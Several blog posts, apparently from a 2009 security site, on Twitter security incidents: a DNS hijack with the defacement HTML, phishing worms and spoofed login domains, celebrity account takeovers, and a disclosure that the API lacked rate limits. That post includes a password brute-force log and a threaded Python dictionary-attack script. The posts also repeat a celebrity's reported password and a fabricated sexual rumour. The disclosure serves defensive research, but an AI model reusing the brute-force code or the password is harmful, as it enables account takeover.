Update on Last Night's DNS Disruption
Domain Name System or DNS is an Internet protocol used to translate IP addresses into domain names so 
instead of typing in a long string of numbers we can enter urls like www.twitter.com into a browser to visit 
our favorite web sites. Last night, DNS settings for the Twitter web site were hijacked. 
From 9:46pm to 11pm PST, approximately 80% of Traffic to Twitter.com was redirected to other web sites. 
We tweeted, blogged, and updated our status page last night.

During the attack, we were in direct contact with our DNS provider, Dynect. We worked closely to reset our 
DNS as quickly as possible. The motive for this attack appears to have been focused on defacing our site, 
not aimed at users—we don't believe any accounts were compromised. If you're concerned that your 
account could have been affected in some way, feel free to contact us, accountsafe [at] twitter.com.

As is always the case, the updates are short on meaningful information, providing a review of what we already read elsewhere, leaving out any indication of how the bad actor or actors got the login credentials for Dyn, and not providing any indication on what might be corrected to prevent this going forward.

Bluehost Responds

Bluehost discovered that Twitter.com had been the victim of a DNS compromise and, further, that the attackers had redirected some of the Twitter traffic to an account hosted on Bluehost servers. This customer account on BlueHost was setup using a stolen identity and credit card, as determined by the Bluehost verification department. The Bluehost abuse department immediately terminated this account. Contact was made by Bluehost to law enforcement agents to assist in all ongoing investigations.

It is somewhat strange that their monitoring did not notice a web site that went from zero to millions of visits in minutes.

Hysteria

The coverage coming out of this incident is riotious:

Thursday night’s cyber attack against the Twitter microblogging service was no routine assault to bring down a website. It was a sophisticated online blitz –perhaps part of an online Iranian cybercampaign – that could prove costly for social media networks.

http://www.csmonitor.com/Money/2009/1218/Iranian-hacker-attack-What-will-it-cost-Twitter

Ah yes, the blitzkrieg online cyberwar has begun. Let me get my hat. If by sophisticated you mean “is able to use a web site” and “knows how to use ‘whois’” then yes, a highly sophisticated assault.

The attack last night on Twitter was clear retribution for the role that the service played during the [post-Iran election] demonstrations, and the role that it continues to play today. We have spoken to a number of sources overnight who have told us that the Iranian Cyber Army, unlike other groups with similar national monikers, is a group name that is to be taken literally ie. it is an Iranian government group. Little is known about how the group operates, but previous attempts to shut off Iranian citizens from Twitter and other web services demonstrate that Iran has the capability and will to use almost any means to control the flow of information on the web both within and outside of its own borders.

http://www.washingtonpost.com/wp-dyn/content/article/2009/12/18/AR2009121801982.html

Do these sources have names or credibility of any kind? Because while this could be a government sponsored group, it could be a pissed off Islamic kid, a group of guys who communicate in an Arabic hacking forum, or any number of things.

In a web war, Iran has demonstrated that almost nobody is immune, the battlefield is level and it is not afraid to fire the first big shots in full view of the entire world.

http://www.techcrunch.com/2009/12/18/twitter-dns-attack-iran/

Are we in a web war with Iran? Because no one has one iota of proof yet that this is an Iranian government sponsored group. For reference, the battlefield is not level if we are in a war, the U.S. dependence on technology is far greater than that of Iran. If they’re ready to step up beyond logging in to an accessible web portal and changing a DNS entry at a managed DNS provider, they could really cause a lot of trouble.

With a large-scale attack on a popular global web service, it is the first time that cyber attacks have been used as part of a propaganda campaign to propel the global political agenda of a foreign government.

http://www.techcrunch.com/2009/12/18/twitter-dns-attack-iran/

Really? I could have sworn I’ve seen web sites defaced for political propaganda purposes before.

The HTML

Since these sites may be taken down at any point, if you want to do further research here is the HTML that was being returned from the defaced web site:

<html>

<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>..:: This Web Site Has Been Hacked By Iranian Cyber Army ::.. </title>
</head>

<body bgcolor="#000000">

<p align="center">&nbsp;</p>
<p align="center"><img border="0" src="index.6.gif"><img border="0" src="index.2.gif"><img border="0" 
src="index.7.gif"></p>
<p align="center"><img border="0" src="index.8.gif"></p>
<p align="center">
<a href="mailto:iranian.cyber.army@gmail.com?subject=Mowjcamp">
<img border="0" src="index.5.gif"></a></p>

<p align="center"><img border="0" src="index.3.jpg" width="43%" height="106%"></p>
<p align="center"><font face="Tahoma" size="2"><b>&nbsp;&nbsp;&nbsp;</b></font></p>
<p align="center"><b><font face="Tahoma" size="2" color="#FFFFFF">nbsp;
&#1576;&#1606;&#1575;&#1605; &#1582;&#1583;&#1575;<br>
&#1576;&#1607; &#1593;&#1606;&#1608;&#1575;&#1606; &#1740;&#1705; 
&#1575;&#1740;&#1585;&#1575;&#1606;&#1740; &#1583;&#1585; &#1662;&#1575;&#1587;&#1582; 
&#1576;&#1607; &#1583;&#1582;&#1575;&#1604;&#1578; &#1607;&#1575;&#1740; 
&#1588;&#1740;&#1591;&#1606;&#1578; &#1570;&#1605;&#1740;&#1586; &#1575;&#1740;&#1606; 
&#1587;&#1585;&#1608;&#1740;&#1587; &#1583;&#1607;&#1606;&#1583;&#1607; &#1576;&#1607; 
&#1583;&#1587;&#1578;&#1608;&#1585; 

&#1605;&#1602;&#1575;&#1605;&#1575;&#1578; 
&#1570;&#1605;&#1585;&#1740;&#1705;&#1575;&#1740;&#1740; &#1583;&#1585; 
&#1575;&#1605;&#1608;&#1585; &#1583;&#1575;&#1582;&#1604;&#1740; 
&#1705;&#1588;&#1608;&#1585;&#1605; )&nbsp; <br>
&#1575;&#1740;&#1606; &#1587;&#1575;&#1740;&#1578; &#1576;&#1607; 
&#1593;&#1606;&#1608;&#1575;&#1606; &#1607;&#1588;&#1583;&#1575;&#1585; &#1607;&#1705; 
&#1605;&#1740; &#1588;&#1608;&#1583; <br>

&nbsp;</font></b></p>

</body>

</html>

Finally

Although Twitter’s security posture has been a well publicized running disaster, this particular circumstance doesn’t really fall under the same category as previous problems because this was an attack outside of the Twitter infrastructure itself. TechCrunch threw something out there about changing your passwords, always a good practice, but your password was probably not at risk during this attack.

Who says the crackers only motivation is money these days?

Critical services such as DNS, BGP Routers, and any service that can single-handedly take down your entire company should be protected by two-factor authentication. Looking at Dyn’s login page on the website, it appears the service uses standard username and password authentication without support for two-factor authentication, something we would suggest that they change or at least offer at cost to larger clients.

But the real crime, as youngluck noted on TechCrunch: “Actually, the sad thing here is that an “army” with enough sophistication to take down Twitter, could have a graphic design department that could suck this bad.”

We’ll update the post if Twitter uncharacteristically provides more information about what happened.

Related Posts:

• Newsweek Reports Zombie Invasion
• Going After BP
• Congressional Web Site Defacements Follow the State of the Union
• Umm…TechCrunch? Defacement Two in 24 Hours
• TechCrunched – TechCrunch the Victim of a Defacement

The @KevinMitnick tweet linking to a phishing site.

This Attack

TweetMixx contains 889 references to this URL and the same message, so Kevin’s account wasn’t the only one the bad actors used to spam Twitter accounts. The URL referenced http://pduda.mobi/adgga is a shortened URL which appears to lead to: http://albums.twitter.placement-selection.com, a spoofed Twitter authentication page. The .mobi extension is a top level domain for mobile sites.

This scam appears to also have been perpetuated with messages of:

• “I think I found ur high school photo ”
• “My friend shoed me you on here:”
• “hi, I want to see if you will score higher on this iq test. take it here”
• “see if your iq is higher than mine. Take the iq quiz”

These tweets have appeared all over Twitter in the last week of November. This second scam sometimes includes a link with the same sub-domain structure as the one above (twitter is spelled wrong in the sub-domain), but with a different second-level domain (sarrispromo.com). Both domains lead directly to the Twitter login page with the extra “>” brace character we have seen before.

Spoofed Twitter login page.

The History That is Mitnick

Mitnick is often cited as the Frank Abagnale (the famous check counterfeiter featured in ‘Catch Me If You Can’) of computer security, but the actual history of Kevin Mitnick is an unmitigated mess. He is well known in computer security circles as a former cracker turned security consultant and author, which is where the Abagnale comparison comes into play. He is acknowledged for the most part as being an expert in social engineering and for successful phone phreaking exploits. In 1988 he was convicted and sentenced to 12 months in prison after breaking into and copying software from Digital Equipment Corporation (DEC). After release he cracked into voice mail computers of Pacific Bell, a warrant was issued for this arrest, and he fled all the while continuing cracking into systems. Among his confirmed criminal acts are cracking into the systems of Motorola, NEC, Nokia, Sun Microsystems, and Fujitsu Siemens, the aforementioned crack into DEC systems to look at VMS source code, gaining admin access on a Computer Learning Center IBM minicomputer, and using the Los Angeles bus transfer system to get free rides as a kid.

After a highly publicized pursuit, Mitnick was taken into custody by the FBI in Raleigh, NC in 1995 and in 1999 as part of a plea agreement confessed to four counts of wire fraud, two counts of computer fraud, and one count of illegal interception of a wire communication. He received 46 months plus an additional 22 months for violating the terms of his 1989 supervised release. Four and a half years of his sentence was served pre-trial (right to a speedy trail?) with eight months in solitary confinement due to unreasonable projections of his capabilities by law enforcement, including the oft repeated: could “start a nuclear war by whistling into a telephone.”

On January 1st, 2000 he was released and subsequently founded Mitnick Security Consulting LLC. He has written two books, The Art of Deception and The Art of Intrusion and contributed to the 2009 release of Unauthorized Access written with Wil Allsopp.

Controversial author and Mitnick sleuth Tsutomu Shimomura.

Past the accepted facts, the story becomes murky. We are left to rely on the story of Mitnick himself, the FBI, a highly controversial book by John Markoff (NY Times journalist) and Tsutomu Shimomura called Take-Down and a follow up book by author Jonathan Littman, The Fugitive Game: Online with Kevin Mitnick, which seeks to debunk as fiction much of what is presented in Takedown. The FBI acknowledges the involvement of Shimomura in a very limited way, but the inconsistencies in his book have made it problematic to believe much of his story.

Markoff also wrote Cyberpunk, which tells the stories of Mitnick and others, but has been criticized for not actually interviewing the still living subjects about their exploits. Mitnick himself has largely been under a gag order that ran until January 29th, 2007, the next month he announced he was writing an autobiography which has yet to be released (expected Spring 2010).

Not a First Timer

Mitnick has been a victim of crackers before, although in those cases it was targeted attacks. Most recently in July of 2009 on the eve of the Black Hat Conference, his web site was defaced with gay pornography and the message “all aboard the mantrain”. Think train to get an understanding of the image displayed. The group Zero for 0wned (zf0) published details of their exploits against Mitnick as well as other security professionals along with commentary:

Kevin has become the media rep for the hacker community, something which he has grown further and 
further apart from ever since his release. Without John Markoff's sensationalist reporting Kevin Mitnick 
would not have the notoriety that allows him to earn his money providing keynotes at conferences all over 
the world. Kevin is polluting the media with bullshit. Whilst we understand that owning him is something 
which has been done many, many times, we felt that not presenting his insecurity publicly would be wrong. 
Since 2003 this has been done three times of note and Kevin has used his enormously powerful SOCIAL 
ENGINEERING techniques to escape with an unharmed repuation each time. The fact is that he cannot 
secure his systems because he does not know how.

From Summer of Hax, July 28th, 2009 by zf0.

What does the Twitter compromise prove?

Let’s assume Kevin is adept enough that he did not provide his credentials to a fake Twitter site. This also does not look like a targeted attack, rather it looks as though his account was caught up in a generic spamming attack against Twitter. What are we left with: a weak or easily guessable/brute forced password? Have bad actors figured out the CAPTCHA mechanism in an efficient way for password brute forcing, or are they breaking in via the Twitter application program interface? The Twitter API represents a delicate balancing act for Twitter, much of the popularity of their service is based on the ability of developers to release tools based on the API, it can not be left as a weak authentication path but it can not be overly onerous to use. Twitter engineers are faced then with an unenviable challenge.

This might demonstrate the pervasiveness of attacks on Twitter, as even security personalities are not immune to account hijack. It would depend largely on the attack vector, how were the credentials for Kevin’s account exposed, was his password of sufficient complexity? However if the password was of sufficient complexity, if credentials were not provided to a phishing web site, if the credentials are not the same used at another web site with weaker security controls, then there may be little to question to question the victim on.

Rather this juncture is again an excellent opportunity for Twitter to research their logs and start reporting to the world what they are actually seeing (failed password attempts, exploitation of alternate authentication paths with weaker controls, etc.). It is time to publish the ‘Twitter Security’ blog. Hiring a head of information security to write it would be a great first step (he or she could work on other things at Twitter while there).

But maybe this is summarized best as Adrian Lamo, the former grey hat hacker now journalist famed for his 2002 break in to the New York Times, who stated in relation to this compromise: “These things happen.”

Updates:

• Kevin Mitnick responds: “Yup, I used a VERY simple password just as I do for junk accounts like latimes.com, etc. Now it’s just a little bit harder, but not much :-) “

Related Posts:

• Persistent XSS on Twitter.com
• James Lipton says “Don’t tweet your junk”
• Not the Haus of Gaga too
• Facebook’s Faith: A New Scareware Attack
• Breaking Twitter (authentication)

• <3 <3 <3 @T3ETH NXT TIME REALNESS PIC A BETTER PASSWORD!!!! PVNKS UNITE!!!
• <3 LADY GAGA – NO HATE INTENDED!!!! CAN’T WAIT 4 THE MONSTER BALL!!!!
• …butt LADY GAGA RULEZ THE WORLD!!!!! Warhol are you listening?!!
• I swear my dick is not as big as T33TH’S!!!! POPWRLDSUCKZ!!! PUNX UNITE!!!! <3
• GAGA PEECE FOR LYFE!!!
• Hay my babies!!! LOVE GAGA??? LOVE T33TH!!! http://www.myspace.com/teethdance

Strange tweets showing up in Lady Gaga's tweetstream.

London band Teeth.

The London band T3eth, suspected of hacking the account.

Anonymous?

The lone offensive tweet references the Internet hoax that suggested Lady Gaga was a hermaphrodite, perpetuated initially by the Youtube video below and a fake quote:

It’s not something that I’m ashamed of, just isn’t something that I go around telling everyone. Yes. I 
have both male and female genitalia, but I consider myself a female. It’s just a little bit of a penis 
and really doesn’t interfere much with my life. The reason I haven’t talked about it is that it’s not a 
big deal to me. Like come on. It’s not like we all go around talking about our vags. I think this is
a great opportunity to make other multiple gendered people feel more comfortable with their bodies. 
I’m sexy, I’m hot. I have both a poon and a peener. Big f*cking deal. 
- Attributed to Lady Gaga

I only bother including the video, because it contains a reference to another famous Internet group: Anonymous. No conspiracy, its just amusing to see Guy Fawke in the beginning of the video hanging out with the Lady Gaga crowd.

Anonymous hanging out at the Lady Gaga concert.

Members of Anonymous protesting scientology.

Britney

On Friday, Britney Spears appeared to be letting us in on a previously unknown penchant for devil worship:

The appearance of the Britney Spears Twitter account on Friday.

Why is this News?

Celebrities having their Twitter accounts cracked doesn’t seem like a new problem, and indeed Britney did report herself dead via Twitter back on June 28th. But there is a difference, and that is that many of the openings for easily brute forcing the Twitter password via the web site have closed. Note I said easily, don’t spam the comments with speculation on how the account was compromised (unless its high quality speculation), we know quite well that Twitter is still far from security nirvana.

Twitter has been slowly closing loop holes in their authentication process over the course of this year. Back in September we pointed out the reCAPTCHA implementation on login that shows up when you enter too many bad authentication attempts, a key difference in the process from when the rash of prominent account break-ins occurred earlier in the year (including the notable crack of a Twitter admin’s account). Twitter has more recently started to lock out accounts for an hour when they provide too many bad passwords (a lousy idea from a security perspective, but we’ll get into that some other time).

In Breaking Twitter we showed how Twitter rate limits were not enforced as advertised in their API documentation, allowing brute force of passwords via the API. Well that hole has somewhat closed (we’ll touch on that in a future post as well).

Now in the Lady Gaga case, Teeth seems to be admitting that they successfully guessed the password, so fair enough for that one. What about the Britney case? Because what was once a very obvious avenue of attack (point password brute forcing tool and click) has become a little less obvious. Maybe its someone in her entourage, or Kevin Federline?

PoPo Zao.

Update

• Lady Gaga had this to say today: “Seems as though my twitter was hacked yesterday. I could be angry, except I secretly love how psychotically smart my fans are.”
• It looks like Lady Gaga’s password was: JustDance1. Explains why it was easy to guess, that’s the title of one of her initial hit songs. Hopefully she doesn’t fall into the category of using the same password on every web site.

References

• Gnash Your Teeth
• Lady Gaga’s Twitter hacked?

Related Posts:

• Persistent XSS on Twitter.com
• James Lipton says “Don’t tweet your junk”
• “Hi. This you?? LOL” Twitter Attack Snares Kevin Mitnick
• Facebook’s Faith: A New Scareware Attack
• Breaking Twitter (authentication)

The @marcorubio twitter account announced “lol it’s amazing. look and feel great with http://cleansefats.com.” on Wednesday. The campaign spokesman Alex Burgos stated that the account password was quickly changed and they are still investigating what happened. The Twitter worm from Wednesday is known to create a phishing style web site to capture Twitter credentials, however there has been no admission from the campaign that anyone fell for this method. It is also not clear that the attack isn’t also seeded by breaking into someone’s Twitter account, a vector still fairly wide open as we detailed in Breaking Twitter. Finally there is the possibility that the “Hi, this you on here” and this attack are separate. Twitter is usually pretty light on details of their analysis (assuming there is an analysis) of these attacks after the fact.

Senate Candidate Rubio discusses colon cleanser.

I got hacked selling something?Could be worse. They could have written Go Noles or Go Jets as if it was 
coming from me!
9:43 AM Oct 29th from Echofon 

Meanwhile Congressman Wamp’s account @zachwamp sent out direct messages or DM’s to his followers reading: “hi. this works. i feel better and look great. http://bdgdfij.info.”. This URL also leads to a site about colon cleansing.

Congressman Wamp warned his followers about the DM’s with the following tweet:

Disregard any direct message you get from my acct, we got spammed. Go to http://zachwamp.com to 
see my real vision for a healthy Tennessee!
12:25 PM Oct 29th from web 

It is unclear at this time whether members of government are targeted because their Twitter followers are in specific need of colon cleansing products and therefore more susceptible to such advertising. Constipation may explain some of the angrier political discourse in the nation of the last six months or so.

Related Posts:

• A twitter “worm’s” brilliant variation
• Operation Phish Phry
• ROFL this you on here? The latest Twitter Worm

:)

In all seriousness, this attack does prey on a successful social engineering ploy, playing on the victim’s vanity or curiosity about themselves and originating the message from a trusted source. On Twitter you can only send a direct message to someone who is following you. Or put another way, only someone whose updates you have previously expressed an interest in and signed up for (followed) can send you one of these messages. This attack is the Twitter equivalent of e-mail phishing schemes that use an e-mail sent from someone else’s address book: essentially you theoretically know the person already and are more likely to open an e-mail received from them and act upon any instructions contained therein. Combine the suggestion that this person you know or know of has found something about you on a blog, a login screen that is familiar, and you end up with a number of compromised Twitter accounts.

In an unusual variant though, the URL used is less like the actual Twitter URL then in the original attack. Upon putting in credentials, you are like the previous attack presented with the ubiquitous fail whale.

Phishing site found when you click on the tweeted URL.

This gets even more bizarre in the that fail whale page redirects you to “whatsup” http://gfsdgdf5845jg.blogspot.com/, the blog of NetMeg99 from Ventura, CA with a picture of an American Idol contestant. NetMeg99 is a handle of Dawn Lager, apparently a big fan of American Idol contestant Adam Lambert, also from Ventura, CA. Here is her twitter feed as an example: http://twitter.com/NetMeg99. The feed looks legitimate, so we have no idea why the site is redirecting to this blog, which is not reported in the malware site listings we checked.

The URL of the phishing site, http://blogger.djhxkcs.com, is again hosted in Beijing, China according to GeoIP, the host is listed as Chinanet Yunnan Province Network which is China Telecom’s (3rd biggest mobile telecom provider in China) internet service. This would link it circumstantially to the previous attack, and therefore to a number of other related attacks as detailed in our previous post.

Related Posts:

• Sir, the floor wishes to hear no more about your colon.
• Operation Phish Phry
• ROFL this you on here? The latest Twitter Worm

In our rampant speculating (guessing), we noted that we thought brute force password attacks would move away from the main Twitter login page because of their implementation of CAPTCHA (showing an image that is easy for a human to translate and type in but difficult for a computer to identify), which occurs after several failed login attempts. While some success has been reported by both researchers attempting to break CAPTCHA, as well as researchers watching others break it, the processing time of dealing with translating thousands of CAPTCHA messages becomes problematic from a password cracking standpoint (as far as we know, if you have a counter example please show us). So where does one go to perform the type of brute force password attack that a teenage hacker used in January to gain access to Crystal the Twitter admin’s account, achieve ‘Happiness’ and allow others to tweet on behalf of Barack Obama and Britney Spears?

Back in January the @BarackObama account was broken into.

We thought that the Twitter API (application program interface) is the next place to go. While moving towards OAuth authentication (a mechanism by which users can provide others access to their data without providing their authentication credentials) the old style API calls with user name and password are still available. Providing an API is one of the primary reasons for Twitter’s popularity, as many tools can provide both interfaces into the online services of Twitter, as well as act as aggregators for the data within Twitter’s data stores. In fact, for most tweeple, the actual system confines of Twitter might as well be a big database, as they are doing their tweeting through TweetDeck or Tweetie, monitoring topics at TwitterFall, looking at their favorite famous twits at Congressional140 or CelebrityTweet, mapping the world’s tweets with TwitterVision, or evaluating themselves with CurseBird.

That same API provides an alternate path for logging into Twitter, and provides all the functionality available through the web application (authentication, reading tweets, tweeting). You can read more about the overall Twitter API here: http://apiwiki.twitter.com.

But wait you say, are you trying to tell us that brute force password attacks will move to the API when I just read on the Twitter API wiki that the API severely limits the rate of calls you are allowed to make to it (200/hour/IP for authenticated requests without whitelisting)? That should be a mitigating control. Should be, but isn’t, because it is not enforced on all of the API calls.

Rate Limit? We don’t need no stinking rate limit.

From the twitter API documenation on account/verify_credentials Twitter states:

Returns an HTTP 200 OK response code and a representation of the requesting user if authentication was successful; returns a 401 status code and an error message if not. Use this method to test if supplied user credentials are valid. Because this method can be a vector for a brute force dictionary attack to determine a user’s password, it is limited to 15 requests per 60 minute period (starting from your first request).

Well, let’s see. Using a simple python program that tried known incorrect passwords as fast as the the API would respond (but well below DOS thresholds), we have this:

[~]% time python twitterauthcheck.py
Login: _eeeeeeeek Password: 0 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 1 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 2 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 3 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 4 failed: HTTP Error 401: Unauthorized

[......SNIP......]

Login: _eeeeeeeek Password: 295 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 296 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 297 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 298 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 299 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: <redacted> accepted
/opt/local/bin/python2.6 testingauth.py  2.03s user 1.47s system 1% cpu 4:25.05 total

So looking at the details we have 300 passwords attempted in 2 minutes and 3 seconds. We can also see on the 300th attempt the password was accepted (we put the correct password in at number 300) so we can conclude that the account is not getting locked out due to enforcement of rate limits. So next we ran the script six times concurrently (3,600 attempts). Still not locked out.

We are also showing that we are able to blow through the overall 150 request limit per IP per hour that Twitter reports is the rate limit. Running multiple attempts did start to hit some 503 Bad Gateway errors which we thought might be the end of the road, but no, it started responding again a second later.

Running the script is slow. Twitter’s greatest defense here against a true brute force attack using a single thread is that it takes a while for their infrastructure to respond. We can call that security through lack of capacity. Since a good password cracker takes more then a few hundred entries to work (this LOphtCrack dictionary has 235,007 entries.), we’ll go multi-threaded.

In a final controlled example, we use a known account where one person sets a dictionary word simple password and the other person runs the script without specifically knowing the password (just in case someone wants to write a Computer Fraud and Abuse Act essay in the comments, when someone logs into their own account its called authentication). Again, low request threshold, and only accessing our own account.

25,086 attempts thus far before we got bored watching it, so a little over 7 hours and the whole 200,000+ dictionary word list would be done, and likely any account using a common dictionary based password would be accessed. We tried a few subsequent runs that mixed in a correct password just to ensure everything was working, and the program notified us of the successful login.

If Twitter wants to minimize the probability of success for this vulnerability it could:

• Enforce its stated rate limits.
• Start requiring minimally complex passwords.
• Complete the migration to OAuth.

As we like Twitter as much as the next, and because we are in favor of good faith disclosure, we have notified them of our concerns. Update: A Twitter representative has responded that the information provided has been sent on to the right internal team at Twitter.

Here’s the Code: threadedtwitter.py
Dictionary: dic.txt

Please note, the code is provided for demonstration purposes only, should not be run ever, and contains intentional errors so that attempts to run it will not work.

The command is as follows: twitterauthcheck.py username passwordlist.txt

import threading,Queue
import socket
import tweethon
import urllib2
import socket
import sys

class Threader:
    # Class taken from: Sept 3 2004, Justin A: http://code.activestate.com/recipes/302746/
    def __init__(self, numthreads):
        self._numthreads=numthreads

    def get_data(self,):
        raise NotImplementedError, "You must implement get_data as a function that returns an iterable"
        return range(10000)
    def handle_data(self,data):
        raise NotImplementedError, "You must implement handle_data as a function that returns anything"
        time.sleep(random.randrange(1,5))
        return data*data
    def handle_result(self, data, result):
        raise NotImplementedError, "You must implement handle_result as a function that does anything"
        print data, result

    def _handle_data(self):
        while 1:
            x=self.Q.get()
            if x is None:
                break
            self.DQ.put((x,self.handle_data(x)))

    def _handle_result(self):
        while 1:
            x,xa=self.DQ.get()
            if x is None:
                break
            self.handle_result(x, xa)

    def run(self):
        if hasattr(self, "prerun"):
            self.prerun()
        self.Q=Queue.Queue()
        self.DQ=Queue.Queue()
        ts=[]
        for x in range(self._numthreads):
            t=threading.Thread(target=self._handle_data)
            t.start()
            ts.append(t)

        at=threading.Thread(target=self._handle_result)
        at.start()

        try :
            for x in self.get_data():
                self.Q.put(x)
        except NotImplementedError, e:
            print e
        for x in range(self._numthreads):
            self.Q.put(None)
        for t in ts:
            t.join()
        self.DQ.put((None,None))
        at.join()
        if hasattr(self, "postrun"):
            return self.postrun()
        return None


class twitterpasswordtester(Threader):

    def get_data(self):
        data = open(sys.argv[2]).read()
        data = data.split('\n')
        self._usename = sys.argv[1]
        self.counter = 0
        return data

    def handle_data(self,p):
        print "in testAuth"
        u = self._usename
        x = tweethon.Api(username=u, password=p)
        x.SetCache(None)
        try:
            x.VerifyCredentials()
            results = "login: {0} Password: {1} accepted\n".format(u, p)
        except urllib2.HTTPError, e:
            results = "login: {0} Password: {1} failed: {2}\n".format(u, p, e)
        finally:
            del x
            return results

    def handle_result(self, data, result):
        print result
        print self.counter 
        self.counter += 1
        self.res.append((data,result))
    def prerun(self):
        self.res=[]
    def postrun(self):
        return self.res


z = twitterpasswordtester(10)
for n,ns in  a.run():
    print n,ns

Tweethon Source: http://bitbucket.org/jrossi/tweethon/src/tip/README

The Tweethon library, the only custom or uncommon library above, is intended to make the Twitter web services API easier for python programmers to use.

Related Posts:

• Persistent XSS on Twitter.com
• iPhone 4 Ordering and Session Switching
• May’s Patch Tuesday
• March’s Patch Tuesday
• Press F1 for Help, pwned.

The phishing site's Twitter login page.

The real Twitter homepage

Because direct messages are private it is not possible for anyone but Twitter itself to pinpoint both when the attack began and the original seeding of the attack (whether compromised user accounts, previously set up Spam/bot accounts, or another method. A number of accounts appear to have been affected; by 5pm TwitScoop (a service that monitors popular Twitter trends) started reporting trending words including “hacked”, “worm”, and “spreading”. The attack is effective based on two classic principles of social engineering: the message comes from someone you have previously followed (and implicitly trust on some level) and the message appeals to a combination of curiosity and vanity.

On Twitter you can only send a direct message to someone who is following you. Or put another way, only someone whose updates you have previously expressed an interest in and signed up for (followed) can send you one of these messages. This attack is the Twitter equivalent of e-mail phishing schemes that use an e-mail sent from someone else’s address book, essentially you theoretically know the person already and are more likely to open an e-mail received from them. Combine the suggestion that this person you know or know of has found a video of you online, a login screen that is familiar, and you end up with a number of compromised Twitter accounts.

The direct message containing the link to the spoofed Twitter login.

This is far from the first worm Twitter has faced (Koobface, StalkDaily, mikeyy), and is not even the first direct message phishing style attack in this style. While labeled a worm on Twitter, it is not confirmed thus far that this is a self-replicating program, an important part of the definition of a computer worm, it just appears that way. In order to get some understanding of this, Twitter would have to release some analysis of their logging, showing some correlation between a compromised Twitter account, a direct message to a group of parties, and then a subsequent compromise and direct message from within that second group, and so on in the chain. For now we’ll assume this is the path this attack is taking with the evidence we have noticed thus far. Regardless since everyone is referring to this as a Twitter worm, for the sake of clarity, we’ll continue to call it a worm here and update if proven otherwise.

What happened if you did go ahead and put credentials in the login screen: Fail Whale.

If you put some string in for the login or password, this is the response.

No Newcomer

The URL in question is hosted in Beijing, China according to GeoIP, the host is listed as Chinanet Yunnan Province Network which is China Telecom’s (3rd biggest mobile telecom provider in China) internet service. The e-mail address used in the registration, lixing688@gmail.com, links this up to similar phishing sites for Twitter and MySpace identified in the malwaredomainlist forums back in July. That time around the site url was: secure-login.twitter.verifiylogin.com/twitter/. MySpace was cloned at rnyspece.com.

Another URL, Faecibook.com, with the same e-mail address for registrar is a phishing site that appears to prey on users in a way very similar to the Twitter attack, posting comments on Facebook such as this: “seen this really bad blog about you? http://www.jdsense.com/search/redirect.php?f=http://blogs.faecibook.com/sessionid?nglnbskuf”.

That e-mail was also used in a series of money transfer agent scams (money mules) with bogus charity phishing web sites (KPEREZHOME, Rodney Lawrence International, Edward White, et. al) all hosted on a problematic registrar, the Xin Net Technology Corporation.

A photographer, Warren Henke, wrote a blog post describing receipt of a phishing e-mail associated with this scam from the Glen Hamilton International Organization.

The Rodney Lawrence International phishing site.

Something New

One of the differences with this attack that separates it from previous ones is that in the time since the more famous compromises of January of this year (Barack Obama, Britney Spears, CBS News, Kevin Rose) Twitter has implemented some controls around the login screen, including a CAPTCHA element that shows up after several bad password entries.

CAPTCHA is a program designed to differentiate humans from computers and prevent abuse by bots, automated programs used to generate spam among other things. It is a contrived acronym standing for Completely Automated Public Turing test to tell Computers and Humans Apart. CAPTCHA has three primary principles: the computer can’t solve it, most humans can, and the tool does not rely on some form of obscurity such as being a new implementation.

reCAPTCHA, a free service that combines CAPTCHA with the digitizing of printed books, newspapers, and old radio shows.

Actually reCAPTCHA is used, a free service that combines CAPTCHA with the digitizing of printed books, newspapers, and old radio shows. When you are translating the image to text, you are acting as a human optical character recognition (OCR) translator. The service was acquired by Google this month. Circumventions of CAPTCHA have occurred with each step in the method’s evolution, starting in wide use from Yahoo’s EZ-Gimpy program, using roughly the same three step process: pre-processing or removing the background obscurities, segmentation or separating the letters, and classification or identification of each letter. Segmentation remains the one area where humans outperform computers; however, spammers are achieving some level of success in this area. Here is a good analysis from WebSense detailing how a service in Russia is achieving a 20% rate in automated breaks of CAPTCHA images.

So CAPTCHA, while not perfect, does help mitigate dictionary brute force password attacks in that it adds another layer of complexity to the authentication process. Some of the reasons for beating CAPTCHA are to be able to post blog comment spam, create fraudulent accounts such as the e-mail example above, and similar automated completion of web forms designed for human interaction. In these applications it makes sense: a download of the image, a translation to text, and the comment spam is posted, the e-mail account created, and so forth. If two or three out of every ten requests is successful, the comment will be posted or new account opened at an acceptable rate.

In a password cracking application, which moves through a number of password possibilities for each id quickly the additional processing combined with a less than perfect translation rate adds a level of complexity likely not used. With that in mind, how does the bad actor break into Twitter accounts easily? The answer may lie in the Twitter API, which while limiting the rate of requests still allows for a large request rate upon request. That is not to suggest that this is definitely what this attacker did, in fact the bad actor in this case may have previously had compromised ids, may have used more conventional spam tactics to get an original seeding of ids, or may have broken into a few early accounts as discussed here. Only Twitter could potentially have the log access to figure this out.

Related Posts:

• Persistent XSS on Twitter.com
• iPhone 4 Ordering and Session Switching
• May’s Patch Tuesday
• March’s Patch Tuesday
• Press F1 for Help, pwned.

Snort is on Twitter

Thus far the account has the distinction of being mentioned (tweeted and retweeted) 10 times on Twitter, while still only being followed by 5 people :). This is probably a reflection of the real life problem of getting people to review and respond to IDS alerts.

Many firms consider intrusion alerts confidential data, right alongside vulnerability and security test data. IDS logs contain information about internal hosts, and if properly tuned (a big if) can be used to discern which signatures a firm is most interested in, potentially because they are aware of vulnerable systems downstream. Ward has partially mitigated this concern by scrubbing out information on his internal hosts in the tweet stream.

Snort is the immensely popular open source network intrusion detection/prevention system originally written by Martin Roesch and maintained today by Sourcefire, the Columbia Maryland security firm of which Roesch is CTO. There are some 3mm downloads of the Snort IDS since inception.

Leon has stated that he will release his code in the next few weeks.

References

TweetYard – Sourcefire and Snort alerts to Twitter

Related Posts: